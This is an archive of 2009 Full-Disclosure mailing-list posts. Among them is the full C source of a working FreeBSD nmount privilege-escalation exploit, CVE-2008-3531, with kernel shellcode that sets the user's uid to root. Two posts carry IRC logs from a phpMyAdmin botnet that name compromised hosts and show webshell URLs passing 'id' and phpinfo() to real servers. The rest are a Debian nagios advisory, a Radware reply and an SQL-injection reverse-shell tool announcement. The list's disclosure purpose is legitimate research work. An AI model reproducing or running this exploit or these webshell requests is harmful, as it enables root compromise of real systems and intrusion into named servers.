[Full-disclosure] One Click Ownage [White Paper and Scripts]
This is a different and more practical approach to get a reverse shell or code execution in SQL Injections (particularly in MSSQL). The idea is simple. Getting a reverse shell from an SQL Injection with one HTTP request without using an extra channel such as TFTP, FTP to upload the initial payload. White paper explains the steps and the details of the attack. Scripts got all the tools you need to create your HTTP request with your own payload. White Paper: http://ferruh.mavituna.com/papers/oneclickownage.pdf Scripts: http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip Presentation (IT Underground 2009): http://www.slideshare.net/fmavituna/one-click-ownage-1660539 Regards, -- http://ferruh.mavituna.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] phpMyAdmin exploited in masses
Hi. Disclosing out of boredom and for the crawlers to archive. Keywords: phpmyadmin, web, exploit, zavod, devitalia, mwstudio, szervernet, infotel, oodrive, iceman, romania, scriptkiddie. An example of the phpmyadmin exploit used in masses without thinking. IRC server: irc10.iceman.ro has address 85.214.36.2 ( h747052.serverkompetenz.net) IRC port: A few domains that are webhosted on the same IP: freebid.de, soccertreff.de, junge-werbung.com, pocket.marktcom.de. Other possible IRC servers: irc11.iceman.ro has address 87.106.2.154 irc12.iceman.ro has address 85.214.84.18 irc14.iceman.ro has address 82.165.30.30 12:51 @who 110 out of 130 hosts, please wait a few minutes before kline ;) 12:51 IceMan eh lol =)) 12:51 IceMan 130 ? 12:52 IceMan ahaha 12:52 IceMan only the ones from root 12:52 IceMan :( 12:52 IceMan i have about 6000 12:52 @who anything else you want to share on the blog ? 12:53 IceMan you r makeing a bloog ? 12:53 IceMan blog* 12:53 @who no, i'm adding an entry. 12:53 IceMan =))) 12:53 IceMan on what blog ? 12:53 @who you'll know in time. 12:53 IceMan just dont add me 12:53 -!- Z [~...@iceman.ro] has joined #phpmyadmin 12:53 IceMan i dont wanna become a STAR Hosts that made me stop scrolling for a second: 12:46 -!- ircb0t|558144 [~b...@static-241064.xdsl.raiffeisen.net] 12:52 -!- ircb0t|76136 [~b...@slice.corp.it] 12:50 -!- ircb0t|298636 [~b...@gw.zavod.ee] 12:50 -!- ircb0t|514818 [~b...@backup.szervernet.hu] 12:47 -!- ircb0t|803682 [~b...@b165.myrootshell.com] 12:47 -!- ircb0t|39903 [~b...@nomail.wietec.com] 12:46 -!- ircb0t|118029 [~b...@hermes.ac-net.at] 12:47 -!- ircb0t|426978 [~b...@mail.icable.at] 12:48 -!- ircb0t|622275 [www-d...@brain.servercrew.de] 12:48 -!- ircb0t|896247 [~b...@www.mwstudio.hu] 12:48 -!- ircb0t|259056 [~b...@mailserver.devitalia.it] 12:49 -!- ircb0t|691775 [~b...@thomas.livenet.ch] 12:50 -!- ircb0t|735988 [www-d...@imukuppi.org] 12:52 -!- ircb0t|981791 [~b...@doha.virtualbuilding.nl] 12:52 -!- ircb0t|376391 [~b...@crm.oodrive.com] 12:51 -!- ircb0t|305549 [~b...@azzinoth.decknet.fr] 12:50 -!- ircb0t|522103 [~b...@master.infotel.it] 12:50 -!- ircb0t|987422 [~b...@gentoo.stofan.sk] List of all visible clients (in #root) 12:41 -!- ircb0t|348728 [~b...@ip-81-11-185-103.dsl.scarlet.be] 12:41 -!- ircname : Linux 2.6.22-14-server 12:41 -!- ircb0t|546679 [~b...@webplus-1.nederhost.net] 12:41 -!- ircname : Linux 2.6.21-xen 12:46 -!- ircb0t|348728 [~b...@ip-81-11-185-103.dsl.scarlet.be] 12:46 -!- ircname : Linux 2.6.22-14-server 12:46 -!- ircb0t|546679 [~b...@webplus-1.nederhost.net] 12:46 -!- ircname : Linux 2.6.21-xen 12:46 -!- ircb0t|768952 [9e8d281...@hartlep.eu] 12:46 -!- ircname : Linux 2.6.18 12:46 -!- ircb0t|100341 [www-d...@bud125.internetdsl.tpnet.pl] 12:46 -!- ircname : Linux 2.6.18-5-686 12:46 -!- ircb0t|360066 [~b...@neobitd.home.net.pl] 12:46 -!- ircname : Linux 2.6.23 12:46 -!- ircb0t|554117 [www-d...@c-89-233-220-91.cust.bredband2.com] 12:46 -!- ircname : Linux 2.6.17 12:46 -!- ircb0t|789508 [~b...@69.60.115.183] 12:46 -!- ircname : Linux 2.6.17-gentoo-r8 12:46 -!- ircb0t|109012 [~b...@moldau.trilos.net] 12:46 -!- ircname : Linux 2.6.17.7 12:46 -!- ircb0t|371797 [~ b...@83-64-255-133.wiener-neudorf.xdsl-line.inode.at] 12:46 -!- ircname : Linux 2.6.19-gentoo-r5 12:46 -!- ircb0t|557516 [~b...@r02s01.colo.vollmar.net] 12:46 -!- ircname : Linux 2.6.18-4-686 12:46 -!- ircb0t|789854 [~b...@86.92.26.138] 12:46 -!- ircname : Linux 2.6.18.1 12:46 -!- ircb0t|118029 [~b...@hermes.ac-net.at] 12:46 -!- ircname : Linux 2.6.18-4-vserver-686 12:46 -!- ircb0t|375254 [~b...@217.157.23.239] 12:46 -!- ircname : Linux 2.6.15-1-686-smp 12:46 -!- ircb0t|558144 [~b...@static-241064.xdsl.raiffeisen.net] 12:46 -!- ircname : Linux 2.6.18-5-xen-amd64 12:46 -!- ircb0t|79389 [~b...@madletomas.netbox.cz] 12:46 -!- ircname : Linux 2.6.14.6 12:46 -!- ircb0t|118901 [~b...@nat-130-146.man.bydgoszcz.pl] 12:46 -!- ircname : Linux 2.6.23-gentoo-r3 12:46 -!- ircb0t|378649 [~b...@mail.jdj.com.pl] 12:46 -!- ircname : Linux 2.6.7-1-386 12:46 -!- ircb0t|564105 [~b...@srv-h64.esp.mediateam.fi] 12:46 -!- ircname : Linux 2.6.18-xenU 12:46 -!- ircb0t|794645 [~b...@64.56.157.143] 12:46 -!- ircname : Linux 2.4.21-50.EL 12:46 -!- ircb0t|134194 [~b...@medimpex13.medimpex.tvnet.hu] 12:46 -!- ircname : Linux 2.6.18-5-686 12:46 -!- ircb0t|394988 [~b...@m13s11.vlinux.de] 12:46 -!- ircname : Linux 2.6.18 12:46 -!- ircb0t|564960 [~b...@turbine.vnetworx.net] 12:46 -!- ircname : Linux 2.6.18-5-686 12:46 -!- ircb0t|798421 [~b...@89.104.213.130] 12:46 -!- ircname : Linux 2.6.18-gentoo-r3 12:46 -!- ircb0t|156819 [~b...@dye204.internetdsl.tpnet.pl] 12:46 -!- ircname : Linux 2.6.15-51-server 12:47 -!- ircb0t|39903 [~b...@nomail.wietec.com] 12:47 -!- ircname : Linux 2.6.18-5-686 12:47 -!- ircb0t|573848 [~b...@229.ispy.se] 12:47 -!- ircname : Linux 2.6.20-gentoo-r8 12:47 -!- ircb0t|803682 [~b...@b165.myrootshell.com] 12:47 -!-
[Full-disclosure] CVE-2008-3531
/* * cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com * * Privilege escalation exploit for the FreeBSD-SA-08:08.nmount * (CVE-2008-3531) vulnerability: * * http://security.freebsd.org/advisories/FreeBSD-SA-08:08.nmount.asc * http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3531 * * For a detailed analysis see: * * http://census-labs.com/news/2009/07/02/cve-2008-3531-exploit/ * * Sample run: * * [a...@leon ~]$ uname -rsi * FreeBSD 7.0-RELEASE GENERIC * [a...@leon ~]$ sysctl vfs.usermount * vfs.usermount: 1 * [a...@leon ~]$ id * uid=1001(argp) gid=1001(argp) groups=1001(argp) * [a...@leon ~]$ gcc -Wall cve-2008-3531.c -o cve-2008-3531 * [a...@leon ~]$ ./cve-2008-3531 * [*] vptr = 0x006e776f * [*] calling nmount() * nmount: Unknown error: -1036235776 * [a...@leon ~]$ id * uid=0(root) gid=0(wheel) egid=1001(argp) groups=1001(argp) * * $Id: cve-2008-3531.c,v 846ca34be34a 2009/02/29 11:05:02 argp $ */ #include sys/param.h #include sys/mount.h #include sys/uio.h #include err.h #include stdio.h #include stdlib.h #include string.h #include sysexits.h #include unistd.h #include sys/types.h #include sys/stat.h #include sys/mman.h #define BUFSIZE 249 #define PAGESIZE4096 #define ADDR0x6e7000 #define OFFSET 1903 #define FSNAME msdosfs #define DIRPATH /tmp/msdosfs unsigned char kernelcode[] = \x64\xa1\x00\x00\x00\x00 /* movl %fs:0, %eax # get curthread */ \x8b\x40\x04 /* movl 0x4(%eax), %eax # get proc from curthread */ \x8b\x40\x30 /* movl 0x30(%eax),%eax # get ucred from proc */ \x31\xc9 /* xorl %ecx, %ecx # ecx = 0 */ \x89\x48\x04 /* movl %ecx, 0x4(%eax) # ucred.uid = 0 */ \x89\x48\x08 /* movl %ecx, 0x8(%eax) # ucred.ruid = 0 */ /* # return to the pre-previous function, i.e. vfs_donmount() */ \x81\xc4\xe8\x00\x00\x00 /* addl $0xe8, %esp */ \x5b /* popl %ebx */ \x5e /* popl %esi */ \x5f /* popl %edi */ \x5d /* popl %ebp */ \xc3; /* ret */ int main() { void *vptr; struct iovec iov[6]; vptr = mmap((void *)ADDR, PAGESIZE, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0); if(vptr == MAP_FAILED) { perror(mmap); exit(EXIT_FAILURE); } vptr += OFFSET; printf([*] vptr = 0x%.8x\n, (unsigned int)vptr); memcpy(vptr, kernelcode, (sizeof(kernelcode) - 1)); mkdir(DIRPATH, 0700); iov[0].iov_base = fstype; iov[0].iov_len = strlen(iov[0].iov_base) + 1; iov[1].iov_base = FSNAME; iov[1].iov_len = strlen(iov[1].iov_base) + 1; iov[2].iov_base = fspath; iov[2].iov_len = strlen(iov[2].iov_base) + 1; iov[3].iov_base = DIRPATH; iov[3].iov_len = strlen(iov[3].iov_base) + 1; iov[4].iov_base = calloc(BUFSIZE, sizeof(char)); if(iov[4].iov_base == NULL) { perror(calloc); rmdir(DIRPATH); exit(EXIT_FAILURE); } memset(iov[4].iov_base, 0x41, (BUFSIZE - 1)); iov[4].iov_len = BUFSIZE; iov[5].iov_base = ; iov[5].iov_len = strlen(iov[5].iov_base) + 1; printf([*] calling nmount()\n); if(nmount(iov, 6, 0) 0) { perror(nmount); rmdir(DIRPATH); exit(EXIT_FAILURE); } printf([*] unmounting and deleting %s\n, DIRPATH); unmount(DIRPATH, 0); rmdir(DIRPATH); return EXIT_SUCCESS; } /* EOF */ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] a simple race condition and how you'd solve it
A friend recently demonstrated on his blog a simple race condition he encountered. He also challenged folks to solve the problem. http://www.algorithm.co.il/blogs/index.php/programming/a-simple-race-condition/ There's an interesting discussion in the comments which is worth a quick read. Also, maybe someone here will come up with a cuter idea? Gadi. -- Gadi Evron, g...@linuxbox.org. Blog: http://gevron.livejournal.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] radware AppWall Web Application Firewall: Source code disclosure on management interface
Dear Shaked Vax, Are you sure Radware Team have analysed reflected attack via user's browser (AppWall administrator visits malcrafted page, page redirects his request to AppWall) before excluding remote vector? --Thursday, July 2, 2009, 3:23:16 PM, you wrote to full-disclosure@lists.grok.org.uk: SV Radware team has completed analysis of the reported issue, concluding SV that no AppWall customer using the product according to Radware SV deployment recommendations would be exposed to vulnerability as a result SV of this issue. This is due to the facts that this issue exists only on SV the management interface that is recommended to be connection to SV internal LAN only, and that it does not allow performing any actions SV that would influence machine functionality. SV Nevertheless, in order to enforce our commitment to deliver top SV security solution to our customers, Radware will supply a fix for this SV issue within its upcoming AppWall release. SV Shaked Vax SV AppWall Product Manager SV shak...@radware.com SV ___ SV Full-Disclosure - We believe in it. SV Charter: http://lists.grok.org.uk/full-disclosure-charter.html SV Hosted and sponsored by Secunia - http://secunia.com/ -- Skype: Vladimir.Dubrovin ~/ZARAZA http://securityvulns.com/ Но Гарри... я безусловно отдаю предпочтение ему, за высокую питательность и какое-то особенно нежное мясо. (Твен) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1825-1] New nagios2/nagios3 packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-1825-1secur...@debian.org http://www.debian.org/security/ Nico Golde July 3rd, 2009 http://www.debian.org/security/faq - -- Package: nagios2, nagios3 Vulnerability : insufficient input validation Problem type : remote Debian-specific: no CVE ID : CVE-2009-2288 It was discovered that the statuswml.cgi script of nagios, a monitoring and management system for hosts, services and networks, is prone to a command injection vulnerability. Input to the ping and traceroute parameters of the script is not properly validated which allows an attacker to execute arbitrary shell commands by passing a crafted value to these parameters. For the oldstable distribution (etch), this problem has been fixed in version 2.6-2+etch3 of nagios2. For the stable distribution (lenny), this problem has been fixed in version 3.0.6-4~lenny2 of nagios3. For the testing distribution (squeeze), this problem has been fixed in version 3.0.6-5 of nagios3. For the unstable distribution (sid), this problem has been fixed in version 3.0.6-5 of nagios3. We recommend that you upgrade your nagios2/nagios3 packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2.diff.gz Size/MD5 checksum:38428 42d830b18bfdeb3292cc926c81e93611 http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6.orig.tar.gz Size/MD5 checksum: 2735504 900e3f4164f4b2a18485420eeaefe812 http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2.dsc Size/MD5 checksum: 1589 228a65351afe2ce6028c3e4b38a7dbd7 Architecture independent packages: http://security.debian.org/pool/updates/main/n/nagios3/nagios3-doc_3.0.6-4~lenny2_all.deb Size/MD5 checksum: 2070624 a3d6285aa4ca170dff3ebc37c661a87f http://security.debian.org/pool/updates/main/n/nagios3/nagios3-common_3.0.6-4~lenny2_all.deb Size/MD5 checksum:76976 46391e4a013e6f4b9d22e7529f5836c2 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_alpha.deb Size/MD5 checksum: 1652478 eeb78e031b3e0df336d473738bb849c3 http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_alpha.deb Size/MD5 checksum: 2256566 1691fcda957f56aa58d4a564249e3cc3 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_amd64.deb Size/MD5 checksum: 1533972 c161bf872c5d5e08188ab30d0ea47acc http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_amd64.deb Size/MD5 checksum: 2537724 75ea70e06091246d69457b3206e7dd57 arm architecture (ARM) http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_arm.deb Size/MD5 checksum: 2219494 fac6212f49e1645e5e562753f342ea73 http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_arm.deb Size/MD5 checksum: 1387152 40e50777dc68548be1cc4d9340074a78 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_armel.deb Size/MD5 checksum: 1444282 639e4563d6009d69c6684117a4d252cd http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_armel.deb Size/MD5 checksum: 2265242 a2874c655c74e88a52838fd0742544aa hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_hppa.deb Size/MD5 checksum: 1557384 49575bfdb3ce7ade125e560586eae41f http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_hppa.deb Size/MD5 checksum: 2362452 360e17eafca70d4124ef4aadb11498d1 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_i386.deb Size/MD5 checksum: 1382416 bcce0eb86a0e94123b73650e49893193 http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_i386.deb Size/MD5 checksum: 2330734
[Full-disclosure] Iceman.Ro - 'new' botnet to come
18:13 -!- IceMan` [...@iceman.ro] has joined #root 18:13 pink_panther Hello, friend 18:13 IceMan` uh :) 18:13 pink_panther We were just talking about you 18:13 L hi there 18:13 IceMan` eh i must close this ircd 2 18:13 IceMan` uf uf uf 18:13 pink_panther a 18:13 IceMan` brb closing the domein 18:13 IceMan` domain* 18:13 pink_panther but it's so cute how you basically took the milw0rm sploit and didn't change it 18:13 pink_panther so everyone could share on these hosts 18:13 pink_panther you're really a nice guy 18:13 IceMan` not really 18:13 pink_panther well yes really. 18:14 IceMan` 87.98.169.9 18:14 IceMan` hack it 18:14 IceMan` 87.98.169.9/phpmyadmin/ 18:14 pink_panther http://imukuppi.org/phpmyadmin/config.inc.php?p=phpinfo(); 18:14 L http://87.98.169.9/phpmyadmin/config.inc.php?c=id 18:14 IceMan` L eh 18:14 IceMan` not like that 18:14 IceMan` because 18:14 IceMan` i put the code there 18:15 IceMan` but hack it like it was fresh 18:15 * pink_panther hahahaHAHaHAhAHahaHAhahaHahaHahahahahAhahahahaha 18:15 L uid=33(www-data) gid=33(www-data) groups=33(www-data) 18:15 pink_panther you so don't get it 18:15 IceMan` eh nevermind 18:15 pink_panther this is fucking entertaining 18:15 L huauahua 18:15 IceMan` i will close the ircd`s anyway :)) 18:15 pink_panther you were klining me earlier 18:15 IceMan` and open bthe on other domeins ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/